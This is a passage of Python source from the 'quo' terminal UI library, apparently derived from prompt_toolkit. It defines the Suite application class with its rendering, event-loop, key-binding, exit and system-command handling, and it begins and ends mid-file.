new_event_loop,
set_event_loop,
sleep,
)
from contextlib import contextmanager
from subprocess import Popen
from traceback import format_tb
from typing import (
Any,
Awaitable,
Callable,
Dict,
FrozenSet,
Generator,
Generic,
Hashable,
Iterable,
List,
Optional,
Tuple,
Type,
TypeVar,
Union,
cast,
overload,
)
from quo.buffer import Buffer
from quo.i_o.termui import echo
from quo.cache import SimpleCache
from quo.clipboard import Clipboard, InMemoryClipboard
from quo.data_structures import Size
from quo.enums import EditingMode
from quo.eventloop import (
get_traceback_from_context,
run_in_executor_with_context,
)
from quo.eventloop.utils import call_soon_threadsafe
from quo.filters import Condition, Filter, FilterOrBool, to_filter
from quo.text import AnyFormattedText
from quo.input.core import Input
from quo.input.typeahead import get_typeahead, store_typeahead
from quo.keys.key_binding.bindings.page_navigation import (
load_page_navigation_bindings,
)
from quo.keys.key_binding.defaults import load_key_bindings
from quo.keys.key_binding.emacs_state import EmacsState
from quo.keys.key_binding.key_bindings import (
Binding,
ConditionalKeyBindings,
GlobalOnlyKeyBindings,
KeyBindingsBase,
KeysTuple,
merge_key_bindings,
)
from quo.keys.key_binding.key_processor import KeyPressEvent, KeyProcessor
from quo.keys.key_binding.vi_state import ViState
from quo.keys import Keys
from quo.layout import Container, Window
from quo.layout.controls import BufferControl, UIControl
from quo.layout.dummy import create_dummy_layout
from quo.layout.layout import Layout, walk
from quo.output import ColorDepth, Output
from quo.renderer import Renderer, print_formatted_text
from quo.search import SearchState
from quo.styles import (
BaseStyle,
DummyStyle,
DummyStyleTransformation,
DynamicStyle,
StyleTransformation,
default_pygments_style,
default_ui_style,
merge_styles,
)
from quo.utils.utils import Event, in_main_thread
from .current import get_app_session, set_app
from .run_in_terminal import in_terminal, run_in_terminal
try:
import contextvars
except ImportError:
import quo.eventloop.dummy_contextvars as contextvars # type: ignore
#__all__ = [
# "Suite",
#]
E = KeyPressEvent
_AppResult = TypeVar("_AppResult")
# event handler
onSuite = Callable[["Suite[_AppResult]"], None]
_SIGWINCH = getattr(signal, "SIGWINCH", None)
_SIGTSTP = getattr(signal, "SIGTSTP", None)
class Suite(Generic[_AppResult]):
"""
The main Suite class!
This glues everything together.
:param layout: A :class:`~quo.layout.Layout` instance.
:param key_bindings:
:class:`~quo.keys.key_binding.KeyBindingsBase` instance for
the key bindings.
:param clipboard: :class:`~quo.clipboard.Clipboard` to use.
:param full_screen: When True, run the application on the alternate screen buffer.
:param color_depth: Any :class:`~.ColorDepth` value, a callable that
returns a :class:`~.ColorDepth` or `None` for default.
:param erase_when_done: (bool) Clear the application output when it finishes.
:param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches
forward and a '?' searches backward. In Readline mode, this is usually
reversed.
:param min_redraw_interval: Number of seconds to wait between redraws. Use
this for applications where `invalidate` is called a lot. This could cause
a lot of terminal output, which some terminals are not able to process.
`None` means that every `invalidate` will be scheduled right away
(which is usually fine).
When one `invalidate` is called, but a scheduled redraw of a previous
`invalidate` call has not been executed yet, nothing will happen in any
case.
:param max_render_postpone_time: When there is high CPU (a lot of other
scheduled calls), postpone the rendering max x seconds. '0' means:
don't postpone. '.5' means: try to draw at least twice a second.
:param refresh_interval: Automatically invalidate the UI every so many
seconds. When `None` (the default), only invalidate when `invalidate`
has been called.
:param terminal_size_polling_interval: Poll the terminal size every so many
seconds. Useful if the applications runs in a thread other then then
main thread where SIGWINCH can't be handled, or on Windows.
Filters:
:param mouse_support: (:class:`~quo.filters.Filter` or
boolean). When True, enable mouse support.
:param paste_mode: :class:`~quo.filters.Filter` or boolean.
:param editing_mode: :class:`~quo.enums.EditingMode`.
:param enable_page_navigation_bindings: When `True`, enable the page
navigation key bindings. These include both Emacs and Vi bindings like
page-up, page-down and so on to scroll through pages. Mostly useful for
creating an editor or other full screen applications. Probably, you
don't want this for the implementation of a REPL. By default, this is
enabled if `full_screen` is set.
Callbacks (all of these should accept an
:class:`~quo.application.Suite` object as input.)
:param on_reset: Called during reset.
:param on_invalidate: Called when the UI has been invalidated.
:param before_render: Called right before rendering.
:param after_render: Called right after rendering.
I/O:
(Note that the preferred way to change the input/output is by creating an
`AppSession` with the required input/output objects. If you need multiple
applications running at the same time, you have to create a separate
`AppSession` using a `with create_app_session():` block.
:param input: :class:`~quo.input.Input` instance.
:param output: :class:`~quo.output.Output` instance. (Probably
Vt100_Output or Win32Output.)
Usage:
app = Suite(...)
app.run()
# Or
await app.run_async()
"""
def __init__(
self,
layout: Optional[Layout] = None,
style: Optional[BaseStyle] = None,
include_default_pygments_style: FilterOrBool = True,
style_transformation: Optional[StyleTransformation] = None,
bind: Optional[KeyBindingsBase] = None,
clipboard: Optional[Clipboard] = None,
full_screen: bool = False,
color_depth: Union[
ColorDepth, Callable[[], Union[ColorDepth, None]], None
] = None,
mouse_support: FilterOrBool = False,
enable_page_navigation_bindings: Optional[
FilterOrBool
] = None, # Can be None, True or False.
paste_mode: FilterOrBool = False,
editing_mode: EditingMode = EditingMode.EMACS,
erase_when_done: bool = False,
reverse_vi_search_direction: FilterOrBool = False,
min_redraw_interval: Union[float, int, None] = None,
max_render_postpone_time: Union[float, int, None] = 0.01,
refresh_interval: Optional[float] = None,
terminal_size_polling_interval: Optional[float] = 0.5,
on_reset: Optional[onSuite] = None,
on_invalidate: Optional[onSuite] = None,
before_render: Optional[onSuite] = None,
after_render: Optional[onSuite] = None,
# I/O.
input: Optional[Input] = None,
output: Optional[Output] = None,
) -> None:
# If `enable_page_navigation_bindings` is not specified, enable it in
# case of full screen applications only. This can be overridden by the user.
if enable_page_navigation_bindings is None:
enable_page_navigation_bindings = Condition(lambda: self.full_screen)
paste_mode = to_filter(paste_mode)
mouse_support = to_filter(mouse_support)
reverse_vi_search_direction = to_filter(reverse_vi_search_direction)
enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings)
include_default_pygments_style = to_filter(include_default_pygments_style)
if layout is None:
layout = create_dummy_layout()
if style_transformation is None:
style_transformation = DummyStyleTransformation()
self.style = style
self.style_transformation = style_transformation
# Key bindings.
self.bind = bind
self._default_bindings = load_key_bindings()
self._page_navigation_bindings = load_page_navigation_bindings()
self.layout = layout
self.clipboard = clipboard or InMemoryClipboard()
self.full_screen: bool = full_screen
self._color_depth = color_depth
self.mouse_support = mouse_support
self.paste_mode = paste_mode
self.editing_mode = editing_mode
self.erase_when_done = erase_when_done
self.reverse_vi_search_direction = reverse_vi_search_direction
self.enable_page_navigation_bindings = enable_page_navigation_bindings
self.min_redraw_interval = min_redraw_interval
self.max_render_postpone_time = max_render_postpone_time
self.refresh_interval = refresh_interval
self.terminal_size_polling_interval = terminal_size_polling_interval
# Events.
self.on_invalidate = Event(self, on_invalidate)
self.on_reset = Event(self, on_reset)
self.before_render = Event(self, before_render)
self.after_render = Event(self, after_render)
# I/O.
session = get_app_session()
self.output = output or session.output
self.input = input or session.input
# List of 'extra' functions to execute before a Suite.run.
self.pre_run_callables: List[Callable[[], None]] = []
self._is_running = False
self.future: Optional[Future[_AppResult]] = None
self.loop: Optional[AbstractEventLoop] = None
self.context: Optional[contextvars.Context] = None
#: Quoted insert. This flag is set if we go into quoted insert mode.
self.quoted_insert = False
#: Vi state. (For Vi key bindings.)
self.vi_state = ViState()
self.emacs_state = EmacsState()
#: When to flush the input (For flushing escape keys.) This is important
#: on terminals that use vt100 input. We can't distinguish the escape
#: key from for instance the left-arrow key, if we don't know what follows
#: after "\x1b". This little timer will consider "\x1b" to be escape if
#: nothing did follow in this time span.
#: This seems to work like the `ttimeoutlen` option in Vim.
self.ttimeoutlen = 0.5 # Seconds.
#: Like Vim's `timeoutlen` option. This can be `None` or a float. For
#: instance, suppose that we have a key binding AB and a second key
#: binding A. If the uses presses A and then waits, we don't handle
#: this binding yet (unless it was marked 'eager'), because we don't
#: know what will follow. This timeout is the maximum amount of time
#: that we wait until we call the handlers anyway. Pass `None` to
#: disable this timeout.
self.timeoutlen = 1.0
#: The `Renderer` instance.
# Make sure that the same stdout is used, when a custom renderer has been passed.
self._merged_style = self._create_merged_style(include_default_pygments_style)
self.renderer = Renderer(
self._merged_style,
self.output,
full_screen=full_screen,
mouse_support=mouse_support,
cpr_not_supported_callback=self.cpr_not_supported_callback,
)
#: Render counter. This one is increased every time the UI is rendered.
#: It can be used as a key for caching certain information during one
#: rendering.
self.render_counter = 0
# Invalidate flag. When 'True', a repaint has been scheduled.
self._invalidated = False
self._invalidate_events: List[
Event[object]
] = [] # Collection of 'invalidate' Event objects.
self._last_redraw_time = 0.0 # Unix timestamp of last redraw. Used when
# `min_redraw_interval` is given.
#: The `InputProcessor` instance.
self.key_processor = KeyProcessor(_CombinedRegistry(self))
# If `run_in_terminal` was called. This will point to a `Future` what will be
# set at the point when the previous run finishes.
self._running_in_terminal = False
self._running_in_terminal_f: Optional[Future[None]] = None
# Trigger initialize callback.
self.reset()
def _create_merged_style(self, include_default_pygments_style: Filter) -> BaseStyle:
"""
Create a `Style` object that merges the default UI style, the default
pygments style, and the custom user style.
"""
dummy_style = DummyStyle()
pygments_style = default_pygments_style()
@DynamicStyle
def conditional_pygments_style() -> BaseStyle:
if include_default_pygments_style():
return pygments_style
else:
return dummy_style
return merge_styles(
[
default_ui_style(),
conditional_pygments_style,
DynamicStyle(lambda: self.style),
]
)
@property
def color_depth(self) -> ColorDepth:
"""
The active :class:`.ColorDepth`.
The current value is determined as follows:
- If a color depth was given explicitly to this application, use that
value.
- Otherwise, fall back to the color depth that is reported by the
:class:`.Output` implementation. If the :class:`.Output` class was
created using `output.defaults.create_output`, then this value is
coming from the $QUO_COLOR_DEPTH environment variable.
"""
depth = self._color_depth
if callable(depth):
depth = depth()
if depth is None:
depth = self.output.get_default_color_depth()
return depth
@property
def current_buffer(self) -> Buffer:
"""
The currently focused :class:`~.Buffer`.
(This returns a dummy :class:`.Buffer` when none of the actual buffers
has the focus. In this case, it's really not practical to check for
`None` values or catch exceptions every time.)
"""
return self.layout.current_buffer or Buffer(
name="dummy-buffer"
) # Dummy buffer.
@property
def current_search_state(self) -> SearchState:
"""
Return the current :class:`.SearchState`. (The one for the focused
:class:`.BufferControl`.)
"""
ui_control = self.layout.current_control
if isinstance(ui_control, BufferControl):
return ui_control.search_state
else:
return SearchState() # Dummy search state. (Don't return None!)
def reset(self) -> None:
"""
Reset everything, for reading the next input.
"""
# Notice that we don't reset the buffers. (This happens just before
# returning, and when we have multiple buffers, we clearly want the
# content in the other buffers to remain unchanged between several
# calls of `run`. (And the same is true for the focus stack.)
self.exit_style = ""
self.background_tasks: List[Task[None]] = []
self.renderer.reset()
self.key_processor.reset()
self.layout.reset()
self.vi_state.reset()
self.emacs_state.reset()
# Trigger reset event.
self.on_reset.fire()
# Make sure that we have a 'focusable' widget focused.
# (The `Layout` class can't determine this.)
layout = self.layout
if not layout.current_control.is_focusable():
for w in layout.find_all_windows():
if w.content.is_focusable():
layout.current_window = w
break
def invalidate(self) -> None:
"""
Thread safe way of sending a repaint trigger to the input event loop.
"""
if not self._is_running:
return
# `invalidate()` called if we don't have a loop yet (not running?), or
# after the event loop was closed.
if self.loop is None or self.loop.is_closed():
return
# Never schedule a second redraw, when a previous one has not yet been
# executed. (This should protect against other threads calling
# 'invalidate' many times, resulting in 100% CPU.)
if self._invalidated:
return
else:
self._invalidated = True
# Trigger event.
self.loop.call_soon_threadsafe(self.on_invalidate.fire)
def redraw() -> None:
self._invalidated = False
self._redraw()
def schedule_redraw() -> None:
call_soon_threadsafe(
redraw, max_postpone_time=self.max_render_postpone_time, loop=self.loop
)
if self.min_redraw_interval:
# When a minimum redraw interval is set, wait minimum this amount
# of time between redraws.
diff = time.time() - self._last_redraw_time
if diff < self.min_redraw_interval:
async def redraw_in_future() -> None:
await sleep(cast(float, self.min_redraw_interval) - diff)
schedule_redraw()
self.loop.call_soon_threadsafe(
lambda: self.create_background_task(redraw_in_future())
)
else:
schedule_redraw()
else:
schedule_redraw()
@property
def invalidated(self) -> bool:
"True when a redraw operation has been scheduled."
return self._invalidated
def _redraw(self, render_as_done: bool = False) -> None:
"""
Render the command line again. (Not thread safe!) (From other threads,
or if unsure, use :meth:`.Suite.invalidate`.)
:param render_as_done: make sure to put the cursor after the UI.
"""
def run_in_context() -> None:
# Only draw when no sub application was started.
if self._is_running and not self._running_in_terminal:
if self.min_redraw_interval:
self._last_redraw_time = time.time()
# Render
self.render_counter += 1
self.before_render.fire()
if render_as_done:
if self.erase_when_done:
self.renderer.erase()
else:
# Draw in 'done' state and reset renderer.
self.renderer.render(self, self.layout, is_done=render_as_done)
else:
self.renderer.render(self, self.layout)
self.layout.update_parents_relations()
# Fire render event.
self.after_render.fire()
self._update_invalidate_events()
# NOTE: We want to make sure this Suite is the active one. The
# invalidate function is often called from a context where this
# application is not the active one. (Like the
# `PromptSession._auto_refresh_context`).
# We copy the context in case the context was already active, to
# prevent RuntimeErrors. (The rendering is not supposed to change
# any context variables.)
if self.context is not None:
self.context.copy().run(run_in_context)
def _start_auto_refresh_task(self) -> None:
"""
Start a while/true loop in the background for automatic invalidation of
the UI.
"""
if self.refresh_interval is not None and self.refresh_interval != 0:
async def auto_refresh(refresh_interval: float) -> None:
while True:
await sleep(refresh_interval)
self.invalidate()
self.create_background_task(auto_refresh(self.refresh_interval))
def _update_invalidate_events(self) -> None:
"""
Make sure to attach 'invalidate' handlers to all invalidate events in
the UI.
"""
# Remove all the original event handlers. (Components can be removed
# from the UI.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
# Gather all new events.
# (All controls are able to invalidate themselves.)
def gather_events() -> Iterable[Event[object]]:
for c in self.layout.find_all_controls():
for ev in c.get_invalidate_events():
yield ev
self._invalidate_events = list(gather_events())
for ev in self._invalidate_events:
ev += self._invalidate_handler
def _invalidate_handler(self, sender: object) -> None:
"""
Handler for invalidate events coming from UIControls.
(This handles the difference in signature between event handler and
`self.invalidate`. It also needs to be a method -not a nested
function-, so that we can remove it again .)
"""
self.invalidate()
def _on_resize(self) -> None:
"""
When the window size changes, we erase the current output and request
again the cursor position. When the CPR answer arrives, the output is
drawn again.
"""
# Erase, request position (when cursor is at the start position)
# and redraw again. -- The order is important.
self.renderer.erase(leave_alternate_screen=False)
self._request_absolute_cursor_position()
self._redraw()
def _pre_run(self, pre_run: Optional[Callable[[], None]] = None) -> None:
"""
Called during `run`.
`self.future` should be set to the new future at the point where this
is called in order to avoid data races. `pre_run` can be used to set a
`threading.Event` to synchronize with UI termination code, running in
another thread that would call `Suite.exit`. (See the progress
bar code for an example.)
"""
if pre_run:
pre_run()
# Process registered "pre_run_callables" and clear list.
for c in self.pre_run_callables:
c()
del self.pre_run_callables[:]
async def run_async(
self,
pre_run: Optional[Callable[[], None]] = None,
set_exception_handler: bool = True,
) -> _AppResult:
"""
Run the quo :class:`~quo.Suite`
until :meth:`~quo.Suite.exit` has been
called. Return the value that was passed to
:meth:`~quo.Suite.exit`.
This is the main entry point for a prompt_toolkit
:class:`~quo.Suite` and usually the only
place where the event loop is actually running.
:param pre_run: Optional callable, which is called right after the
"reset" of the application.
:param set_exception_handler: When set, in case of an exception, go out
of the alternate screen and hide the application, display the
exception, and wait for the user to press ENTER.
"""
assert not self._is_running, "Suite is already running."
async def _run_async() -> _AppResult:
"Coroutine."
loop = get_event_loop()
f = loop.create_future()
self.future = f # XXX: make sure to set this before calling '_redraw'.
self.loop = loop
self.context = contextvars.copy_context()
# Counter for cancelling 'flush' timeouts. Every time when a key is
# pressed, we start a 'flush' timer for flushing our escape key. But
# when any subsequent input is received, a new timer is started and
# the current timer will be ignored.
flush_task: Optional[asyncio.Task[None]] = None
# Reset.
# (`self.future` needs to be set when `pre_run` is called.)
self.reset()
self._pre_run(pre_run)
# Feed type ahead input first.
self.key_processor.feed_multiple(get_typeahead(self.input))
self.key_processor.process_keys()
def read_from_input() -> None:
nonlocal flush_task
# Ignore when we aren't running anymore. This callback will
# removed from the loop next time. (It could be that it was
# still in the 'tasks' list of the loop.)
# Except: if we need to process incoming CPRs.
if not self._is_running and not self.renderer.waiting_for_cpr:
return
# Get keys from the input object.
keys = self.input.read_keys()
# Feed to key processor.
self.key_processor.feed_multiple(keys)
self.key_processor.process_keys()
# Quit when the input stream was closed.
if self.input.closed:
if not f.done():
f.set_exception(EOFError)
else:
# Automatically flush keys.
if flush_task:
flush_task.cancel()
flush_task = self.create_background_task(auto_flush_input())
async def auto_flush_input() -> None:
# Flush input after timeout.
# (Used for flushing the enter key.)
# This sleep can be cancelled, in that case we won't flush yet.
await sleep(self.ttimeoutlen)
flush_input()
def flush_input() -> None:
if not self.is_done:
# Get keys, and feed to key processor.
keys = self.input.flush_keys()
self.key_processor.feed_multiple(keys)
self.key_processor.process_keys()
if self.input.closed:
f.set_exception(EOFError)
# Enter raw mode, attach input and attach WINCH event handler.
with self.input.raw_mode(), self.input.attach(
read_from_input
), attach_winch_signal_handler(self._on_resize):
self.create_background_task(self._poll_output_size())
# Draw UI.
self._request_absolute_cursor_position()
self._redraw()
self._start_auto_refresh_task()
# Wait for UI to finish.
try:
result = await f
finally:
# In any case, when the application finishes.
# (Successful, or because of an error.)
try:
self._redraw(render_as_done=True)
finally:
# _redraw has a good chance to fail if it calls widgets
# with bad code. Make sure to reset the renderer
# anyway.
self.renderer.reset()
# Unset `is_running`, this ensures that possibly
# scheduled draws won't paint during the following
# yield.
self._is_running = False
# Detach event handlers for invalidate events.
# (Important when a UIControl is embedded in multiple
# applications, like ptterm in pymux. An invalidate
# should not trigger a repaint in terminated
# applications.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
self._invalidate_events = []
# Wait for CPR responses.
if self.output.responds_to_cpr:
await self.renderer.wait_for_cpr_responses()
# Wait for the run-in-terminals to terminate.
previous_run_in_terminal_f = self._running_in_terminal_f
if previous_run_in_terminal_f:
await previous_run_in_terminal_f
# Store unprocessed input as typeahead for next time.
store_typeahead(self.input, self.key_processor.empty_queue())
return result
async def _run_async2() -> _AppResult:
self._is_running = True
# Make sure to set `_invalidated` to `False` to begin with,
# otherwise we're not going to paint anything. This can happen if
# this application had run before on a different event loop, and a
# paint was scheduled using `call_soon_threadsafe` with
# `max_postpone_time`.
self._invalidated = False
loop = get_event_loop()
if set_exception_handler:
previous_exc_handler = loop.get_exception_handler()
loop.set_exception_handler(self._handle_exception)
try:
with set_app(self):
try:
result = await _run_async()
finally:
# Wait for the background tasks to be done. This needs to
# go in the finally! If `_run_async` raises
# `KeyboardInterrupt`, we still want to wait for the
# background tasks.
await self.cancel_and_wait_for_background_tasks()
# Set the `_is_running` flag to `False`. Normally this
# happened already in the finally block in `run_async`
# above, but in case of exceptions, that's not always the
# case.
self._is_running = False
# Also remove the Future again. (This brings the
# application back to its initial state, where it also
# doesn't have a Future.)
self.future = None
return result
finally:
if set_exception_handler:
loop.set_exception_handler(previous_exc_handler)
return await _run_async2()
def run(
self,
pre_run: Optional[Callable[[], None]] = None,
set_exception_handler: bool = True,
in_thread: bool = False,
) -> _AppResult:
"""
A blocking 'run' call that waits until the UI is finished.
This will start the current asyncio event loop. If no loop is set for
the current thread, then it will create a new loop. If a new loop was
created, this won't close the new loop (if `in_thread=False`).
:param pre_run: Optional callable, which is called right after the
"reset" of the application.
:param set_exception_handler: When set, in case of an exception, go out
of the alternate screen and hide the application, display the
exception, and wait for the user to press ENTER.
:param in_thread: When true, run the application in a background
thread, and block the current thread until the application
terminates. This is useful if we need to be sure the application
won't use the current event loop (asyncio does not support nested
event loops). A new event loop will be created in this background
thread, and that loop will also be closed when the background
thread terminates. When this is used, it's especially important to
make sure that all asyncio background tasks are managed through
`get_appp().create_background_task()`, so that unfinished tasks are
properly cancelled before the event loop is closed. This is used
for instance in ptpython.
"""
if in_thread:
result: _AppResult
exception: Optional[BaseException] = None
def run_in_thread() -> None:
nonlocal result, exception
try:
result = self.run(
pre_run=pre_run, set_exception_handler=set_exception_handler
)
except BaseException as e:
exception = e
finally:
# Make sure to close the event loop in this thread. Running
# the application creates a new loop (because we're in
# another thread), but it doesn't get closed automatically
# (also not by the garbage collector).
loop = get_event_loop()
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
thread = threading.Thread(target=run_in_thread)
thread.start()
thread.join()
if exception is not None:
raise exception
return result
# We don't create a new event loop by default, because we want to be
# sure that when this is called multiple times, each call of `run()`
# goes through the same event loop. This way, users can schedule
# background-tasks that keep running across multiple prompts.
try:
loop = get_event_loop()
except RuntimeError:
# Possibly we are not running in the main thread, where no event
# loop is set by default. Or somebody called `asyncio.run()`
# before, which closes the existing event loop. We can create a new
# loop.
loop = new_event_loop()
set_event_loop(loop)
return loop.run_until_complete(
self.run_async(pre_run=pre_run, set_exception_handler=set_exception_handler)
)
def _handle_exception(
self,
loop: AbstractEventLoop,
context: Dict[str, Any]
) -> None:
"""
Handler for event loop exceptions.
This will print the exception, using run_in_terminal.
"""
# For Python 2: we have to get traceback at this point, because
# we're still in the 'except:' block of the event loop where the
# traceback is still available. Moving this code in the
# 'print_exception' coroutine will loose the exception.
tb = get_traceback_from_context(context)
formatted_tb = "".join(format_tb(tb))
async def in_term() -> None:
async with in_terminal():
# Print output. Similar to 'loop.default_exception_handler',
# but don't use logger. (This works better on Python 2.)
echo(f"Unhandled ", nl=False)
echo(f"exception", fg="black", bg="yellow", nl=False)
echo(f" in the event loop:")
echo(formatted_tb)
print("Exception %s" % (context.get("exception"),))
await _do_wait_for_enter("𝙿𝚛𝚎𝚜𝚜 𝙴𝙽𝚃𝙴𝚁 𝚝𝚘 𝚌𝚘𝚗𝚝𝚒𝚗𝚞𝚎...⏳")
ensure_future(in_term())
def create_background_task(
self,
coroutine: Awaitable[None]
) -> "asyncio.Task[None]":
"""
Start a background task (coroutine) for the running application. When
the `Suite` terminates, unfinished background tasks will be
cancelled.
If asyncio had nurseries like Trio, we would create a nursery in
`Suite.run_async`, and run the given coroutine in that nursery.
Not threadsafe.
"""
task = get_event_loop().create_task(coroutine)
self.background_tasks.append(task)
return task
async def cancel_and_wait_for_background_tasks(self) -> None:
"""
Cancel all background tasks, and wait for the cancellation to be done.
If any of the background tasks raised an exception, this will also
propagate the exception.
(If we had nurseries like Trio, this would be the `__aexit__` of a
nursery.)
"""
for task in self.background_tasks:
task.cancel()
for task in self.background_tasks:
try:
await task
except CancelledError:
pass
async def _poll_output_size(self) -> None:
"""
Coroutine for polling the terminal dimensions.
Useful for situations where `attach_winch_signal_handler` is not sufficient:
- If we are not running in the main thread.
- On Windows.
"""
size: Optional[Size] = None
interval = self.terminal_size_polling_interval
if interval is None:
return
while True:
await asyncio.sleep(interval)
new_size = self.output.get_size()
if size is not None and new_size != size:
self._on_resize()
size = new_size
def cpr_not_supported_callback(self) -> None:
"""
Called when we don't receive the cursor position response in time.
"""
if not self.output.responds_to_cpr:
return # We know about this already.
def in_terminal() -> None:
self.output.write(
"WARNING: your terminal doesn't support cursor position requests (CPR).\r\n"
)
self.output.flush()
run_in_terminal(in_terminal)
@overload
def exit(self) -> None:
"Exit without arguments."
@overload
def exit(self,
*,
result: _AppResult,
style: str = ""
) -> None:
"Exit with `_AppResult`."
@overload
def exit(
self,
*,
exception: Union[BaseException, Type[BaseException]],
style: str = ""
) -> None:
"Exit with exception."
def exit(
self,
result: Optional[_AppResult] = None,
exception: Optional[Union[BaseException, Type[BaseException]]] = None,
style: str = "",
) -> None:
"""
Exit application.
.. note::
If `Suite.exit` is called before `Suite.run()` is
called, then the `Suite` won't exit (because the
`Suite.future` doesn't correspond to the current run). Use a
`pre_run` hook and an event to synchronize the closing if there's a
chance this can happen.
:param result: Set this result for the application.
:param exception: Set this exception as the result for an application. For
a prompt, this is often `EOFError` or `KeyboardInterrupt`.
:param style: Apply this style on the whole content when quitting,
often this is 'class:exiting' for a prompt. (Used when
`erase_when_done` is not set.)
"""
assert result is None or exception is None
if self.future is None:
raise Exception("Suite is not running. Suite.exit() failed.")
if self.future.done():
raise Exception("Return value already set. Suite.exit() failed.")
self.exit_style = style
if exception is not None:
self.future.set_exception(exception)
else:
self.future.set_result(cast(_AppResult, result))
def _request_absolute_cursor_position(self) -> None:
"""
Send CPR request.
"""
# Note: only do this if the input queue is not empty, and a return
# value has not been set. Otherwise, we won't be able to read the
# response anyway.
if not self.key_processor.input_queue and not self.is_done:
self.renderer.request_absolute_cursor_position()
async def run_system_command(
self,
command: str,
wait_for_enter: bool = True,
display_before_text: AnyFormattedText = "",
wait_text: str = "𝙿𝚛𝚎𝚜𝚜 𝙴𝙽𝚃𝙴𝚁 𝚝𝚘 𝚌𝚘𝚗𝚝𝚒𝚗𝚞𝚎...⏳",
) -> None:
"""
Run system command (While hiding the prompt. When finished, all the
output will scroll above the prompt.)
:param command: Shell command to be executed.
:param wait_for_enter: FWait for the user to press enter, when the
command is finished.
:param display_before_text: If given, text to be displayed before the
command executes.
:return: A `Future` object.
"""
async with in_terminal():
# Try to use the same input/output file descriptors as the one,
# used to run this application.
try:
input_fd = self.input.fileno()
except AttributeError:
input_fd = sys.stdin.fileno()
try:
output_fd = self.output.fileno()
except AttributeError:
output_fd = sys.stdout.fileno()
# Run sub process.
def run_command() -> None:
self.print_text(display_before_text)
p = Popen(command, shell=True, stdin=input_fd, stdout=output_fd)
p.wait()
await run_in_executor_with_context(run_command)
# Wait for the user to press enter.
if wait_for_enter:
await _do_wait_for_enter(wait_text)
def suspend_to_background(self, suspend_group: bool = True) -> None:
"""
(Not thread safe -- to be called from inside the key bindings.)
Suspend process.
:param suspend_group: When true, suspend the whole process group.
(This is the default, and probably what you want.)
"""
# Only suspend when the operating system supports it.
# (Not on Windows.)
if _SIGTSTP is not None:
def run() -> None:
# Send `SIGTSTP` to own process.
# This will cause it to suspend.
# Usually we want the whole process group to be suspended. This
# handles the case when input is piped from another process.
if suspend_group:
os.kill(0, _SIGTSTP)
else:
os.kill(os.getpid(), _SIGTSTP)
run_in_terminal(run)
def print_text(
self, text: AnyFormattedText, style: Optional[BaseStyle] = None
) -> None:
"""
Print a list of (style_str, text) tuples to the output.
(When the UI is running, this method has to be called through
`run_in_terminal`, otherwise it will destroy the UI.)
:param text: List of ``(style_str, text)`` tuples.
:param style: Style class to use. Defaults to the active style in the CLI.
"""
print_formatted_text(
output=self.output,
formatted_text=text,
style=style or self._merged_style,
color_depth=self.color_depth,
style_transformation=self.style_transformation,
)
@property
def is_running(self) -> bool:
"`True` when the application is currently active/running."
return self._is_running
@property
def is_done(self) -> bool:
if self.future:
return self.future.done()
return False
def get_used_style_strings(self) -> List[str]:
"""
Return a list of used style strings. This is helpful for debugging, and
for writing a new `Style`.
"""
attrs_for_style = self.renderer._attrs_for_style
if attrs_for_style:
return sorted(
[
re.sub(r"\s+", " ", style_str).strip()
for style_str in attrs_for_style.keys()
]
)
return []
class _CombinedRegistry(KeyBindingsBase):
"""
The `KeyBindings` of key bindings for a `Suite`.
This merges the global key bindings with the one of the current user
control.
"""
def __init__(self,
app: Suite[_AppResult]
)-> None:
self.app = app
self._cache: SimpleCache[
Tuple[Window, FrozenSet[UIControl]], KeyBindingsBase
] = SimpleCache()
@property
def _version(self) -> Hashable:
"""Not needed - this object is not going to be wrapped in another
KeyBindings object."""
raise NotImplementedError
def bindings(self) -> List[Binding]:
"""Not needed - this object is not going to be wrapped in another
KeyBinder object."""
raise NotImplementedError
def _create_key_bindings(
self,
current_window: Window,
other_controls: List[UIControl]
) -> KeyBindingsBase:
"""
Create a `KeyBinder` object that merges the `KeyBinder` from the
`UIControl` with all the parent controls and the global key bindings.
"""
bind = []
collected_containers = set()
# Collect key bindings from currently focused control and all parent
# controls. Don't include key bindings of container parent controls.
container: Container = current_window
while True:
collected_containers.add(container)
kb = container.get_key_bindings()
if kb is not None:
bind.append(kb)
if container.is_modal():
break
parent = self.app.layout.get_parent(container)
if parent is None:
break
else:
container = parent
# Include global bindings (starting at the top-model container).
for c in walk(container):
if c not in collected_containers:
kb = c.get_key_bindings()
if kb is not None:
bind.append(GlobalOnlyKeyBindings(kb))
# Add App key bindings
if self.app.bind:
bind.append(self.app.bind)
# Add mouse bindings.
bind.append(
ConditionalKeyBindings(
self.app._page_navigation_bindings,
self.app.enable_page_navigation_bindings,
)
)
bind.append(self.app._default_bindings)
# Reverse this list. The current control's key bindings should come
# last. They need priority.
bind = bind[::-1]
return merge_key_bindings(bind)
@property
def _key_bindings(self) -> KeyBindingsBase:
current_window = self.app.layout.current_window
other_controls = list(self.app.layout.find_all_controls())
key = current_window, frozenset(other_controls)
return self._cache.get(
key, lambda: self._create_key_bindings(current_window, other_controls)
)
def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]:
return self._key_bindings.get_bindings_for_keys(keys)
def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]:
return self._key_bindings.get_bindings_starting_with_keys(keys)
async def _do_wait_for_enter(wait_text: AnyFormattedText) -> None:
"""
Create a sub application to wait for the enter key press.
This has two advantages over using 'input'/'raw_input':
- This will share the same input/output I/O.
- This doesn't block the event loop.
"""
from quo.shortcuts import Prompt
from quo.keys import KeyBinder
key_bindings = KeyBinder()
@key_bindings.add("enter")
def _ok(event: E) -> None:
event.app.exit()
@key_bindings.add(Keys.Any)
def _ignore(event: E) -> None:
"Disallow typing."
pass
session: Prompt[None] = Prompt(
text=wait_text, key_bindings=key_bindings
)
await session.app.run_async()
@contextmanager
def attach_winch_signal_handler(
handler: Callable[[], None]
) -> Generator[None, None, None]:
"""
Attach the given callback as a WINCH signal handler within the context
manager. Restore the original signal handler when done.
The `Suite.run` method will register SIGWINCH, so that it will
properly repaint when the terminal window resizes. However, using
`run_in_terminal`, we can temporarily send an application to the
background, and run an other app in between, which will then overwrite the
SIGWINCH. This is why it's important to restore the handler when the app
terminates.
"""
# The tricky part here is that signals are registered in the Unix event
# loop with a wakeup fd, but another application could have registered
